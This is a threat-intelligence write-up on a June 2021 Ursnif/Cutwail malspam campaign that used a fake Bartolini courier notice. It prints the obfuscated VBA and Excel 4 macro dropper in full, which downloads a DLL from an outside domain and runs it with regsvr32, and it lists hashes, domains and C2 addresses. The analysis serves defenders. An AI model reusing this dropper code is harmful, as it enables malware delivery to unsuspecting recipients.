Ursnif/Cutwail Malware — June 2021

We observed a new malspam campaign distributing Ursnif malware. The malware attachment presents itself as a counterfeit delivery notification from the courier Bartolini.

The malicious attachment belongs to the Cutwail v2 botnet, operated by the threat actor NARWHAL SPIDER (reference).
Cutwail v2 is also known as 0bulk Psych Evolution R4.
Cutwail originated in 2007 and expanded through Pushdo, a malware that infected numerous Windows systems and enrolled them into the botnet.
Through 2020, Cutwail v2 primarily distributed malware including Dridex and Gozi, alongside phishing fraud schemes designed to harvest user credentials.

XLSM File

The email attachment contains an xlsm file (dropper).

Macro Details

Macros contained in the email attachment:

Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO Questa_cartella_di_lavoro.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/Questa_cartella_di_lavoro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Function testo_uno()

For Each di In Sheets(3).UsedRange.SpecialCells(xlCellTypeConstants): Pk = "-"
Hi = Split(di, Pk)
For Each X In Hi
nnv = nnv & Sheets(msoTabStopCenter).Range(X)
Next
Next
testo_uno = nnv
End Function

Function minusole(uu As String, ik As Integer)
Sheets(1).Cells(ik, 1).FormulaLocal = uu
End Function

Sub rempofo()
mII = 0: COsT = 0: Run ("casuale")
End Sub

Function revisio()
Sheets(1).Cells(6, 1).FormulaLocal = pago_i & nuove_d
End Function

Function nuove_d()
nuove_d = "T" & vnumeros & "O" & "()"
End Function

Function fare_E() As String
fare_E = "" & "Y"
End Function

Function pago_i()
pago_i = Guida_1 & "R" & "I"
End Function

Function v_promo() As Variant
v_promo = Split(testo_uno, "" & fare_E)
End Function

Function coSa() As String
coSa = "O"
End Function

Function pagina_P()
pagina_P = revisio
End Function

Sub Visualizzazioni()
Excel4MacroSheets.Add Before:=Worksheets(1): ActiveSheet.Visible = xlSheetHidden
riservata = pagina_P: Sheets(1).Cells(2, 1).Name = "casuale"
For Each xt In v_promo
dalla_legge = minusole(Guida_1 & xt, 2): rempofo
Next
End Sub

Function Guida_1()
Guida_1 = "="
End Function

Function bertranno()
bertranno = "" & "_i"
End Function

Function vnumeros() As String
vnumeros = coSa & "RN"
End Function
-------------------------------------------------------------------------------
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|Suspicious|Run                 |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings                    |
|Hex String|'\x00\x02\x08\x19'  |00020819                                     |
|Hex String|'\x00\x00\x00\x00\x0|000000000046                                 |
|          |0F'                 |                                             |
|Hex String|'\x00\x02\x08 '     |00020820                                     |
+----------+--------------------+---------------------------------------------+

NOME.RIF("KK";"er")
NOME.RIF("D";"\")
NOME.RIF("m";ARCCOS(-0,5)*135/PI.GRECO())
NOME.RIF("p";COS(RADIANTI(60))-COS(60*PI.GRECO()/180))
NOME.RIF("K";"w")
NOME.RIF("Z";"o")
SE(VAL.NUMERO(RICERCA(K;INFO.AREA.DI.LAVORO(1))); ;CHIUDE(VERO))
NOME.RIF("A";"C:"&D&CODICE.CARATT(CASUALE.TRA(65;m))&CODICE.CARATT(CASUALE.TRA(65;m))&CASUALE.TRA(100;999)&CODICE.CARATT(CASUALE.TRA(65;m)))
NOME.RIF("if";CODICE.CARATT(115))
NOME.RIF("B";A&D&CODICE.CARATT(CASUALE.TRA(65;m))&CODICE.CARATT(CASUALE.TRA(65;m))&CASUALE.TRA(100;999)&CODICE.CARATT(CASUALE.TRA(65;m)))
NOME.RIF("F";INFO.AREA.DI.LAVORO(13)&".")
NOME.RIF("U";"e")
RICHIAMA("K"&U&"rn"&U&"l32";"Cr"&U&"at"&U&"Direct"&Z&"ryA";"JCJ";A;p)
NOME.RIF("G";NOME.RIF("h";"i"))
RICHIAMA("K"&KK&"n"&U&"l32";"CreateDir"&U&"ct"&Z&"ryA";"JCJ";B;p)
NOME.RIF("S";"t")
RICHIAMA("URLMON";"URLD"&Z&"wnl"&Z&"adT"&Z&"FileA"; "JJCCJJ";p;RIMPIAZZA("hqps:"&INFO.AREA.DI.LAVORO(9)&INFO.AREA.DI.LAVORO(9)&"c"&Z&"nsul"&S&"a"&S&"y"&Z&"n"&DESTRA(F)&"c"&Z&"m";2;1;S&S);B&D&F;p;p
)
ATTESA(ADESSO()+"00:00:09")
RICHIAMA("Sh"&U&"ll32";"Sh"&U&"llEx"&U&"cut"&U&"A"; "JJCCCCJ";p;"Op"&U&"n";"r"&U&"gsvr32";" -"&if&" "&B&D&F;p;p)
FILE.CHIUDI(FALSO)

The macro embedded in the document initiates a connection to the domain consultatyon[.]com to download a dll file containing the next stage of Ursnif. Our Cyber Threat Intelligence tracking identified this delivery pattern as consistent with T1566.001 (Phishing: Spearphishing Attachment) and T1204.002 (User Execution: Malicious File).

DLL

• md5 3896AEE936D55D53EFA5E0D1C2AB817D
• sha1 589E3E955C870821277C7F2EA9F60BC37BBB7825
• sha256 E53CAA0529020312A9092B409C2A38D6DDF0C3D2786832A514657CA617DF770F
• first-bytes-hex 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00
• imphash 33440A0287E1F3D8BFD56DD3109F1807
• cpu 32-bit

Exports

• Gasalways text:01019E40
• Pitchnecessary text:0101A79B

Analysis of the dll permits identification of domains used for downloading the subsequent stage.

In the final stage, command and control (C2) server IP addresses and domains are identifiable.

IOC

DLL

• sha256 E53CAA0529020312A9092B409C2A38D6DDF0C3D2786832A514657CA617DF770F

Domains and IP Addresses

DLL:

• consultatyon[.]com

Loader:

• roudinoden[.]club
• cloudinoren[.]club

C2:

• 46.21.153[.]208
• 46.21.153[.]209
• 46.21.153[.]212
• goudinoden[.]club
• woudinoden[.]club
• poudinoden[.]club